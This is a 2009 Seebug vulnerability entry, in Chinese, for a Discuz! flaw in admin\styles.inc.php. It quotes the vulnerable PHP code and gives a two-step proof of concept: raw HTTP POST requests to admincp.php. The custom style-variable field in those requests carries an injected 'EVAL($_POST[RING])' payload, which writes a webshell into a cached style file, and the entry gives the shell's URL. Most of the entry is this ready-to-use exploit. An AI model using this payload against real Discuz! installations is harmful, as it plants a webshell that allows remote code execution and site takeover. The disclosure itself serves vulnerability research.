Lucene search
RootSSV:11825HistoryJul 17, 2009 - 12:00 a.m.
Discuz! admin\styles.inc.php get-webshell bug
2009-07-1700:00:00
Root
www.seebug.org
25
在文件admin\styles.inc.php里代码:
if($newcvar && $newcsubst) {
if($db->result_first("SELECT COUNT() FROM {$tablepre}stylevars WHERE variable=‘$newcvar’ AND styleid=‘$id’")) {
cpmsg(‘styles_edit_variable_duplicate’, ‘’, ‘error’);
} elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]/", $newcvar)) {
cpmsg(‘styles_edit_variable_illegal’, ‘’, ‘error’);
}
$newcvar = strtolower($newcvar);
$db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
VALUES (‘$id’, ‘$newcvar’, ‘$newcsubst’)");
}
上面代码可以看出来当有后台权限时,可通过编辑风格,自定义模板变量处插入<strong> !',‘80VUL’);EVAL($_POST[RING]);// </strong> 替换出插入 exp by ring04h!,远程写入webshell执行代码.
Discuz!
该漏洞已提交,等待官方补丁.
POC:
step1:
POST /bbs/admincp.php?action=styles HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
formhash=99238f2d&anchor=&updatecsscache=0&namenew%5B1%5D=%C4%AC%C8%CF%B7%E7%B8%F1&availablenew%5B1%5D=1&defaultnew=1&newname=exp&stylesubmit=%CC%E1%BD%BB
step2:
POST /bbs/admincp.php?action=styles&operation=edit&id=6 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1402
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB
webshell:
http://www.80vul.com/bbs/forumdata/cache/style_6.php